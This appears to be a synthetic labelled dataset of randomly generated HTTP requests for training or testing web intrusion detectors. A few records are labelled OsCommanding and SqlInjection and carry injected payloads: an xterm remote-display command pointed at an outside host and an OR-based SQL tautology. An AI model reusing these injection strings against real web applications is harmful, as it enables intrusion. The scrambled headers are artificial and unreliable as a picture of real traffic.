Date: Fri, 02 Feb 07 02:00:07 GMT
ETag: W/"@z8ynpSgZnklNnDIWs-"
Expect: auldt=tiyaz
From: Tieh@ettdu.fr
If-Modified-Since: Tue, 21 Mar 06 15:33:27 UTC
If-Unmodified-Since: Tue, 25 Jan 05 20:39:44 UTC
If-Match: "r5CgJPPf5pXplZ-9.Pa"
If-None-Match: *
If-Range: Tue, 29 Apr 08 14:55:50 UTC
Max-Forwards: 0561
MIME-Version: 0.8
Pragma: hun=St0ipnes
Proxy-Authorization: NTLM ZGE5ZWVjbGVjaW1vb2VuYnRoaWV0c3J1YWgxb2h0MWxkc2hpMG9nbHN0cA==
Authorization: NTLM ZGJobm9ub21udGVramhzdzhsdGdmOHh2dGV4Y3JoTnJrSHl0dGNvc2hubmFxdFJ0
Range: 18-
Referer: /uHcb0a/meuTeos.php3
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/9.4 (Windows; U; Win98 8.1; fu-ir; rv:6.0.5) Gecko/09523065
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: vqqrs; Eollet=shl2r
Upgrade: ya9/0.7
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24379
Start - Id: 5429
class: Valid
POST /iaht/8doaasdiD/g7O-/4yc-/feeeneoeoabtyshjorth/qsxNhmorea7Ca.js? HTTP/1.1
Content-Length: 98
Content-Language: eidht,mea,ua
Content-Encoding: deflate
Content-Location: /5x0nbn/b57ird/0eh2EteS/Hadra/yoibey.pl
Content-MD5: MWhpbnRlaTZyZ3JyZWhpeg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 20:50:02 GMT
Last-Modified: Sun, 04 Jan 09 11:21:22 GMT
Host: 232.71.84.191
Connection: keep-alive
Accept: text/*;q=0.6, image/png
Accept-Charset: windows-1258;q=0.5, us-ascii;q=0.7, shift_jis;q=0.1, iso-8859-4;q=0.8, windows-1251;q=0.1
Accept-Encoding: *
Accept-Language: minN-a, ghrst-th
Cache-Control: max-age=7
Client-ip: 143.152.60.110
Cookie: HevC9eisetOt8no=7;8mxH5deBieeidhe=75;dlisbehv=n8tU8weaov5gs;ntmlsa=h f0edocumentfo/EU?am;EWVC3MS7k=nasw1nooosa8dtr;e9hN=Y
Cookie2: $Version="13"
Date: Sun, 18 Feb 07 06:40:30 CET
ETag: W/"F2.P0o80Q4JQvnt58"
Expect: hrahedu
From: duemse@aiti.it
If-Modified-Since: Mon, 14 Feb 05 15:11:18 UTC
If-Unmodified-Since: Sun, 05 Apr 09 22:06:53 GMT
If-Match: "ercKWFyC73sZFhQ"
If-None-Match: *
If-Range: Tue, 23 Mar 04 16:46:12 GMT
Max-Forwards: 5357
MIME-Version: 8.8
Pragma: boJdres=no09hId
Proxy-Authorization: Basic SWF6OWNyOmNlZk50
Authorization: Basic eFI5OGVlOnJ5dlR5ZG90
Range: 11-,07-65786
Referer: /txrotu/nenmH/iee9vo/leEl/nyrvbOer.php
TE: deflate;q=0.1,trailers
Trailer: Expect
User-Agent: Mozilla/2.3 (compatible; MSIE 0.2; SunOS sun4u; nTTdtOf2CS; nesTmrjC)
UA-CPU: MIPS
UA-Disp: 1986,145,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 375x4615
Via: FTP/8.0 www.ndmhsh.shtml, olt/2.1 44.25.126.225
Transfer-Encoding: compress
Upgrade: amueL/0.0, Etejai/3.0, Exil5t/1.5, tzs/6.8
Warning: 931 www.eklh.tiff:81851 "rgEe" 
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AMtmp-9Gexec5=68&rgim5dt=boot.iniOa9t&r7oooutnp6e=78719379&cntlAEes=912&is6g1arla=siH9odve1s7rsaoa

End - Id: 5429
Start - Id: 43583
class: OsCommanding
GET /n7.JCAK.asp?JC5t2ps2=whn&dKOlpassthruxhttpzr7HO=464403698&ugtaoeenyaiwTon=683&5EGMKS7inFcYw=ElypositionheinFrotirtmocha&tsdNapalibunHq=nxd0h&passwdL_BKIupdateh=IdTtohtue&oD49j4heoiocet=avsne&uitlobxxfultt7s=mm8kwRDHua&te6Eqea=%250A+++++xterm+++++-display+++++www.sees.com%3A0.0++++&l5aqaStoe=rQlb&osesgtgTiltemax=22931&oeelcyaiOo=n6WhJKsNAVM&eSan=u0c&PQuBtmpid=4278&hlehITscIe=Jh%7E%3A HTTP/1.1
Host: 114.45.232.255
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: min-fresh=80040
Client-ip: 43.226.69.253
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="7"
Date: Wed, 06 Jan 10 23:38:27 CET
ETag: "z@VDwv-LBAonIc6"
Expect: rttt=uyHbwh7I
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 01 Oct 05 23:54:45 UTC
If-Unmodified-Since: Thu, 25 Dec 08 06:11:52 UTC
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 2117
MIME-Version: 0.2
Pragma: i30cor=aaP5NEe
Proxy-Authorization: Basic Mm9zZXNlbzphc3dkaGVq
Authorization: NTLM YmlldGJMZTRhOWhhaTN0U3J4aURyaHJlZWFTM3lhSG9vdHR0ckFp
Range: 08647-744
Referer: http://rqur5e.st/uwstsddo/h3ehsu/rat3ac/vfnt/8aosodin.cgi
TE: chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.6 (compatible; tlt4i5snh; Open BSD i386; srteY)
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 881x134
Via: FTP/6.6 www.tsnjM4ci.css:855, 0.4 243.144.177.121:23466, 6.0 203.235.97.34:6143
Transfer-Encoding: gzip
X-Forwarded-For: 171.91.103.182
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43583
Start - Id: 21968
class: Valid
GET /wAneem4/eZNnEkm46xzOV/cUGrf5GK76JLxA/oeon/7DWumQp/iL4zWIAB7SX-6X_wINe6/t-ZtMRaqziu/esnDe42adeg/oiej/tCeHp.htm?OXX0CN=+%27l2%5BaednexeclthEyvar&9blhndot=re%3Bhttpwsbniupdatesh&On=071290&Teu=nOxyXXzFncP9&s0LlDZKKz_4O=niZo9st&dDsuNl6htsarnl=9916096 HTTP/1.1
Host: www.mety0fo1.biz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.5, identity
Accept-Language: Uii-yfaaq;q=0.3
Cache-Control: min-fresh=8
Client-ip: 3.169.52.148
Cookie: TRau7sdWoNeMw=msh'dh@0a0e~h;s;oifljtogydtc94t=ptwoOeshb2l;rtoufeEpv=insertlhg';ftlRidnEGsB=foall]lU-7;raexeefevqd=olRo8st;chbtwepsacidee=1406891
Cookie2: $Version="56"
Date: Tue, 10 Jul 07 08:45:50 CET
ETag: W/"bquNntauCwXOwIv9c"
Expect: neoot=oinv6tgt
From: zeose@esnekaphed.be
If-Modified-Since: Mon, 10 Dec 07 12:56:55 GMT
If-Unmodified-Since: Sun, 10 Apr 05 12:59:37 CET
If-Match: "8A5ZTIeiz1Tcr.3pBXB"
If-None-Match: *
If-Range: *
Max-Forwards: 0864
MIME-Version: 4.8
Pragma: ura=Kogarl
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: n7ttn eohsaan=sics
Range: 2-874,8-,3113-623962
Referer: http://fssa.de/dwey3.jpg
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Expect
User-Agent: Mozilla/4.7 (Windows; U; Win98 9.6; nq-ti; rv:1.1.1) Gecko/87091546
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: 5.9 2.128.65.161:17801, 4.8 www.sxHt.png
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 198.11.68.176
X-Serial-Number: 09176432061314
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21968
Start - Id: 17876
class: Valid
GET /y9WQp/cV42@1k__1W4wS25G/qQ53AspH.ETOr6.jsp?opXbckuickwi=35&nedeyafao=0&exi=7490&epceis=49082835&5buree=6&3CYsi=1sw90hlW&t0dpossdN6=eodeletes+s&vstrs=ocjtse94se&eoleitne=txA18J&pnarpootec=reml&X6Oz8bkM068=222&iNd=1&aasuuhhAena=i+aF+tadminbLiniaIriema&AFetqa86Nx=5681011&hTlApdVo=0L%3Dmyjlibmwlnux HTTP/1.0
Host: 245.219.5.85:76
Connection: close
Accept: application/x-tar, video/quicktime
Accept-Charset: gb2312;q=0.1, iso-8859-4, x-mac-cyrillic, gb2312
Accept-Encoding: *;q=0.7
Accept-Language: l-e1tsiqm;q=0.1
Cache-Control: min-fresh=21
Client-ip: 78.14.160.119
Cookie: reh=dS lO;Lec=923;uItussNbp8ceOo=0r-eedcoEsaea cnus;sIae0toqp=Aue$:%R4c2gh6s
Cookie2: $Version="47"
Date: Tue, 04 Mar 08 19:54:33 GMT
ETag: "uXPXcexxgKdrDYnufxs"
Expect: 100-continue
From: obt52e@273onh4Wsq.be
If-Modified-Since: Thu, 08 Feb 07 20:23:56 GMT
If-Unmodified-Since: Wed, 18 Aug 04 17:16:13 GMT
If-Match: "lPt2Jl6TJ2k48i7XPJ"
If-None-Match: *
If-Range: Wed, 19 Nov 08 07:24:42 CET
Max-Forwards: 213
MIME-Version: 8.8
Pragma: sws8eoe='ct5ivI'
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic OXlzMGRjOmFuYW9laWU=
Range: 0553-412,892-528226
Referer: /Yrhu/oS40tug.ace
TE: trailers
Trailer: If-Match
User-Agent: HmsXiikbhiraNmrb
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: oMc45t
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17876
Start - Id: 2303
class: Valid
GET /u5IAK-shtpassJxml/cd4Rci3hC9rgRhsoovfp/BCH_SetcPz/gx4/rNScYY/i6regi/h29gdr7/nynt/nhAlEgE3gym7O/ut1ar9LuI-QMj2.cfm?xqos=Bsn9ae8cU&5Xuxusnis=eie%40&zd5icTtgpditfyp=j7u&titntd7fh=hs%3FtssSci&oht1y=tTGgKtR&oeooQ=1&rdg=n0_ HTTP/1.1
Host: 135.136.138.248:88694
Connection: ate9h
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 33.149.56.167
Cookie: edswyramo=721081;4uvgr=awkyloj;N0MmWN8IR=w0lwerous;fmZ3ZQ4=ahal
Cookie2: $Version="23"
Date: Sat, 07 Feb 09 20:30:21 GMT
ETag: W/"zU_HB4J1r5_CeqRPv"
Expect: 100-continue
From: Epwt@mIbard.com
If-Modified-Since: Fri, 02 Nov 07 12:50:22 CET
If-Unmodified-Since: Sat, 23 Oct 04 03:00:19 GMT
If-Match: "ixKU5p9aV8Z7-LNLY"
If-None-Match: "ZCdM3NjisEP.9B_x"
If-Range: "Xfb8bP8i4F6jYDeSry"
Max-Forwards: 566
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest username="edVc4k"
Authorization: mieIN frf5oprp=1rjel
Range: -494,196929-21,-666817
Referer: http://e13tww.ch/tE4at/beors.conf
TE: gzip;q=0.3
Trailer: Accept
User-Agent: Mozilla/0.0 (compatible; MSIE 6.5; Linux i586; 4hlt3)
UA-CPU: 68000
UA-Disp: 359,305,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6264x742
Via: 3.6 195.189.206.1:6760, 5.3 42.51.97.252, HTTP/6.2 57.149.229.182:2661
Transfer-Encoding: gzip
Upgrade: genlR/0.3, rbx/3.6, eue/8.6, et6E6/2.3
Warning: 208 www.eitdhsli.js "wemveareeDOs" "Mon, 08 Dec 08 21:25:27 UTC"
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2303
Start - Id: 42548
class: SqlInjection
GET /av5xs/iKgM0Y0QNmf/crtceeo/ha/04/s8/ai4pCF1zwaWJe-/pt7V/hNt/ut/a1jRX_h5..6qdaBXvp/on9t8n.mdb?hnctun9uAodrya=t%27Vtnotewe%5CC&toc6bQ=44850400&60nans=51997&oan=%27+++++OR+%27srq6lbe%27+++%3D+++++N%27+++++&ihhgrdh6eFfrl=881&etrhTsfdree=34236&lrtnqeue4=Ep4a8he&aonB=6%29+%3Do&nuai=E9e&U0sr0emirtr9f=8562&Nknbgeooyuibi=16&rTlvtinismthm=71299054&9kHKn7bErgroup byNL=078735 HTTP/1.0
Host: 43.98.31.133:788
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.1, macintosh;q=0.5, isiri-3342
Accept-Encoding: identity;q=0.2, identity;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 15.200.32.132
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="597"
Date: Thu, 01 Dec 05 08:45:56 UTC
ETag: W/"gEAy5nWg0ykG4kp-"
Expect: oc967Rm
From: nxfuvsb@brtsroeeU.org
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Sun, 10 Feb 08 24:23:11 GMT
If-Match: "YCHfNxaPI4v6f5y"
If-None-Match: *
If-Range: "87TxGXuyjTXYIhi9BR@P"
Max-Forwards: 6848
MIME-Version: 3.7
Pragma: lremsDh=xZa
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -23041,40-95155,61918-
Referer: http://4neesu.de/eeon/rddzinep.doc
TE: gzip;q=0.0
Trailer: Via
User-Agent: ecLIujTH http://www.xmuira.uk
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: 7.7 www.salfoeT.png, 0.2 www.1lrhr.css, HTTP/4.2 87.92.174.85:17978
Transfer-Encoding: compress
Upgrade: aehy/9.2, etyl/6.6
Warning: 087 94.225.210.152:5070 "hd1enneoq" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 14019668167016941
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42548
Start - Id: 16905
class: Valid
GET /vronUxeSybea7/swcno4lsljeljksre/cJV0jMOUNbocRS87/a0C3eTdA.w5RED5@A5.js?tctpuetesbtjrm=nb-a&4rxqrnGthet=gI%40C.p&agawoo9=e2UA4C-YdyC&eatro=834&1perlA1W9C2=83&eteewcaeenwo=w5Ygvb48qtr&lOdihsewlhNme=adrnl05lsROm&1trqL=%3Blso+P&mV@94Og42.=4835535&xbsoD8x=etqwSrsht&ttse=e&ovesed=e328S%40zDlt.&qxmlinclude4OUW=mY4.nV HTTP/1.1
Host: www.iray9jt.biz
Connection: ae6mol5w
Accept: text/*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate;q=0.5, identity, identity;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 254.25.138.231
Cookie: ehKYehtpass=tmpaoiuns;Ehuyesf811H0=ayn;piijmmece4Qal=eaTHWWNIPeoK;wtIsixo2NwWsaoo=htpasst-$pDrcpnhlr6 e
Cookie2: $Version="10"
Date: Mon, 12 Nov 07 14:03:55 CET
ETag: W/"12Ne@V_DU0DcIxV"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Sat, 09 Feb 08 16:02:35 UTC
If-Unmodified-Since: Thu, 30 Mar 06 02:38:23 CET
If-Match: "Pu-nTLAMr83EUCOAj"
If-None-Match: *
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 1222
MIME-Version: 7.6
Pragma: Stn='sp'
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: eIrf aCo5gdr=nhHiR
Range: -3
Referer: /6hreto/roo5Mtih/iethb/mtTiknne.mpg
TE: chunked;q=0.5,gzip,trailers
Trailer: From
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 8.7; en-wD; rv:4.7.9) Gecko/72385126
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: HTTP/1.0 www.dumsh.gif, FTP/6.9 233.113.24.174, 4.7 138.132.152.25
Transfer-Encoding: identity
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 144.164.88.102
X-Serial-Number: 81135810517
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16905
Start - Id: 29507
class: Valid
GET /sdtdsi5ju/HgaoTo58eaao6on/likexAetmpp0/fS/3e6deytunux/6zeicfaeRhtt/window.openln71W/njVBGBgXwAD7/lzPRTJC_duLKHo9@n1/7sswij/wnoes57eEetyUyhoar.php3?asdeAt=285347&K8e4JADM=36717135&eiwrlnfit2=body HTTP/1.0
Host: 88.96.3.140
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2;q=0.2, shift_jis, windows-1250, koi8;q=0.8
Accept-Encoding: deflate
Accept-Language: ttl3to-3;q=0.3, t6ib-yo;q=0.0, e-NdbnUaew
Cache-Control: rpdtvyc='ceatnom'
Client-ip: 215.49.238.10
Cookie: n1Towt5vtswl=hone)HdpA;dnqw2Rd7dsinjf=t7PTwinntJSsock_streamee4;tlo1r=tn6zLpcu0g
Cookie2: $Version="237"
Date: Thu, 21 Aug 08 09:35:52 CET
ETag: W/"6MeY5OzJtp5Cza3Fnr"
Expect: 100-continue
From: mv60oy@frtpeenv.biz
If-Modified-Since: Sat, 19 May 07 22:20:26 GMT
If-Unmodified-Since: Fri, 18 May 07 08:06:25 GMT
If-Match: *
If-None-Match: "RjcDc6k7sLd_xkUMDLe"
If-Range: Mon, 09 Mar 09 23:21:47 UTC
Max-Forwards: 81
MIME-Version: 2.6
Pragma: i4syerl='gsEaw'
Proxy-Authorization: 40goe uren9esp=e5th
Authorization: Digest qop=dnht3
Range: 251-31,847-,2-
Referer: http://www.rtuls.cz/gmolehoG/mdrlntjk/fteosffQ.zip
TE: gzip;q=0.3,deflate,chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: oQ0uWlW7 http://www.maanib1.fr
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 641x2619
Via: 9.8 www.ynctav.css, 6.9 www.leonyhqa.shtml
Transfer-Encoding: identity
Upgrade: nene/2.6
Warning: 369 www.wbAesst9.html "c8gOtonht" "Fri, 11 Sep 09 04:28:00 UTC"
X-Forwarded-For: 1.97.153.134
X-Serial-Number: 801273405
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 29507
Start - Id: 7946
class: Valid
POST /lheps4i/3tho1laoofntdtnJhpre/tp5ojipFaQdE-k4_V9S/hs2sthotcogt/r1wssx7r9Aubo2w8a/2SEkK_mDR/mpwenin/cnSIrocereabonltbs97/03Ea2W/4deNdp/bgIgTnxEFWZwgx739ARc/objectIv.exe? HTTP/1.1
Content-Length: 273
Content-Language: Oy,1sljdsa,sbcmFshy
Content-Encoding: gzip
Content-Location: /4eeh.png
Content-MD5: MVl1UmloZW9qcHRhZXRUcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 10 08:41:17 UTC
Last-Modified: Mon, 23 Apr 07 01:57:42 CET
Host: 220.84.144.251
Connection: keep-alive
Accept: text/*;q=0.8, audio/basic
Accept-Charset: windows-874;q=0.2, iso-8859-2;q=0.2, iso-10646-ucs-2;q=0.5, iso-8859-9
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 225.243.67.249
Cookie: gEe2iihx6euec=wdfoziiwemt;Zmxnd=mCRih9MR9fp-;rwPGQ=88;7hs1mvoteqB=amr
Cookie2: $Version="5"
Date: Fri, 21 Sep 07 13:14:56 GMT
ETag: W/"ziPuCXh3nnhUVa@V8AjO"
Expect: atro=ooe5
From: nhostr0g@gey2ahsod.de
If-Modified-Since: Sun, 29 Mar 09 05:19:49 UTC
If-Unmodified-Since: Fri, 11 Nov 05 17:22:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Jun 09 01:17:10 UTC
Max-Forwards: 0604
MIME-Version: 1.5
Pragma: ekec1wyc=nhao2pt
Proxy-Authorization: Basic a3B3UGl1Omh0bWl0dHhl
Authorization: NTLM dHV5dHQ5dXRtZXR4bmlwQWFlaG1saW04a2hzTXN0dG50dGQw
Range: -0226,-162
Referer: /Hu7hOot/ofua/iotstrw.shtml
TE: trailers
Trailer: Expect
User-Agent: wndgrt0ob/8.4.5.8
UA-CPU: Sparc
UA-Disp: 1557,362,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7210x017
Via: 7.3 213.205.21.199, FTP/8.5 102.35.69.162
Transfer-Encoding: oOt7t; 4opltavn=itGpewu5
Upgrade: trRo/5.6, ifba/9.6, zny5I0/7.1, eloec/8.2, jblog/3.6
Warning: 024 www.O7oep.htm "aennnrtyleRmrdHsfeP" "Wed, 26 May 04 05:12:06 CET"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 940687449310
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hsp8IT=6179&wtco9o=6982530&bhns2htats9ufe=2754&beakrNhn=x&ehlf9TA9wq3=9328&qfromV7Fe8IAc= armlrmmS:ooj&nncbhdiWa8=gwIDl&tienet=1iknu&hadeke=isftHlI&dnaViah=xY4Zl1p9&urhciYear7t=)&Pxcaccept66_b._=e&eStaa&keerden4=xer&syoecTires8ts=rinsertm=e9>htpasse5r&eimhtsn=453

End - Id: 7946
Start - Id: 15653
class: Valid
GET /a3LuscriptUyhAmtb/aCBHfMd8hXL_17@/ayHYan/aKixr5x_yBA/bVRFjuFZWz@dQJJ/mame/d5/ezarNAeift2aad/rf/hgubhWlEa.php?io54snnat0ybihe=obetweenee8&te=ttrusmolaccess_logiHeot&Tstyle6bU=tohniaec&eptcGsheostykee=kw5aSvh&dyctonekcuchhl=yZyEhbHreplacesiboki HTTP/1.1
Host: www.ooheh.net
Connection: close
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=504
Client-ip: 9.72.225.172
Cookie: ngair5hrne3=l0Sws;D2zMcopydI88yA=ktenh8a;aeoep=6;WncrI=6DS.
Cookie2: $Version="6"
Date: Thu, 09 Jun 05 19:10:14 CET
ETag: "lDLQgR9R_ezwuB.FCa"
Expect: os6bi=AtHottq;ytotu
From: enyentta@0oaremMh1h.cz
If-Modified-Since: Mon, 29 Mar 10 01:28:12 CET
If-Unmodified-Since: Thu, 26 Apr 07 20:27:59 CET
If-Match: *
If-None-Match: *
If-Range: "2M3fVzfqokGYo_-"
Max-Forwards: 7430
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: reai onoshDhe=eba1
Authorization: NTLM MmVnbmFoMGhlbXU4dDJhZW9zZWdqOHQwSWVveGRpN2NBeWdFb29pZQ==
Range: 4066-0881,3-
Referer: http://www.ds9Ce.com/sraue3ti/Nacea/rapkr5yu/ltcgpl/lnefnS.dll
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.6 (Machintosh; U; PPC Mac OS X 0.6; at-tl; rv:4.2.3) Gecko/12706987
UA-CPU: PowerPC
UA-Disp: 043,7183,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2296x8201
Via: 3.0 31.95.87.189
Transfer-Encoding: gzip
Upgrade: 6tin9m/2.5
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15653
Start - Id: 34588
class: Valid
PUT /r-n8eXX4O9O/edmHdonohlgftgorehha.swf? HTTP/1.0
Content-Length: 80
Content-Language: r88anw
Content-Encoding: deflate
Content-Location: /hntr.png
Content-MD5: c21ubHRlcmNhY2I3bHpwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Aug 07 01:17:47 GMT
Last-Modified: Sun, 01 May 05 03:47:22 CET
Host: www.enrofql6l.com:31
Connection: 1aens
Accept: audio/basic, video/*;q=0.9
Accept-Charset: euc-jp;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: min-fresh=34
Client-ip: 101.186.217.139
Cookie: rfsi2viAaSo=erela;jwteMtoWo38nddr=o&eewce:zhtelnetsTut&u;mmE1HEZwD=tvhtg;0cc=aqNi7iH4_mF.;rmex7Bs=h9eim2tesxo2;tqtnkhaEtso1=h8zaUY
Cookie2: $Version="5"
Date: Thu, 18 Jan 07 21:16:17 CET
ETag: W/"Y75WqmdTn8xthbc"
Expect: 100-continue
From: Oaodnbea@frlfa.ch
If-Modified-Since: Mon, 08 Nov 04 09:11:30 GMT
If-Unmodified-Since: Sat, 19 May 07 07:02:38 UTC
If-Match: *
If-None-Match: "VKTy9QHX2rYTYjO"
If-Range: Fri, 31 Oct 08 02:30:22 GMT
Max-Forwards: 16
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest opaque="aerr"
Range: 1867-,-2727
Referer: http://www.htr7h.de/hvnt/rn3hHEe/syhj.bin
TE: gzip,trailers,chunked;q=0.9
Trailer: Date
User-Agent: hl9i (oZuQvW3j; cJhfge5LT; 1xkDhPO)
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: FTP/8.3 20.209.187.254, 2.0 www.tdnae.html
Transfer-Encoding: compress
Upgrade: aiiee/8.2, tosd/8.9
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 219.77.85.235
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@psystems4OqfMiG=iSkIi9oJra&ciDe=eAaqssdds&duaEoussh=tdOobjecttae:%8gx fhs31

End - Id: 34588
Start - Id: 17112
class: Valid
GET /tbw.cgi?mzcu=cJGu4Hp&rrEfuocged=olnl%5Dti%2Fee&ntiimenn=daS&l8EYhtpassPHSxDUE=y0rL&lir6hPae4um=ominaoaunfh&Vzq-ZjR=tmocha%25crr%26d%40rc%2BenrNh&Tumhho=-%7EwiNljenda7rn&hfYrne=yddttwtttletfnrt&a43lefeodrr=6wd0db&4edSpsOFYa=51655&ouem4lo7s=RY0shXndtif8isam&es75rmseHz=mohwaoctcoNsvu&podjlmkoacnb=fs HTTP/1.1
Host: www.adimm8KtsA.cz
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: x-mac-icelandic;q=0.1, windows-1255, iso-8859-8, koi8, cp-936
Accept-Encoding: identity, identity, deflate;q=0.8
Accept-Language: tMowp-ua;q=0.5, tWr-dlels;q=0.3, mei-ondltEgx, 9e-5;q=0.8
Cache-Control: seSamo5k=eaafw
Client-ip: 55.33.105.236
Cookie: OxlrtirTo=axAOo-1;cIdteodoptiUTna=>bdr5lnsnbZuoer;nb5trndi=fIlmphE
Cookie2: $Version="75"
Date: Sun, 22 Oct 06 03:13:15 GMT
ETag: W/"Dg5zclpWresAC-p1"
Expect: ebpsa=omltsd;y5ns9=sp1Eidj
From: eeootn2@riitt3.org
If-Modified-Since: Sun, 24 Jan 10 05:57:49 CET
If-Unmodified-Since: Mon, 27 Apr 09 06:05:50 GMT
If-Match: *
If-None-Match: "mcpXB9G80Lqvh405G71"
If-Range: Wed, 12 Aug 09 15:50:57 CET
Max-Forwards: 709
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZW9mcmRtdHNpcnRybmxpOWRuRGV5cGFpbnJ5bnA0cm10b29jYXNoZWNFbmVoZnRD
Authorization: Basic dGRsM2lsOnN2aWlubmM=
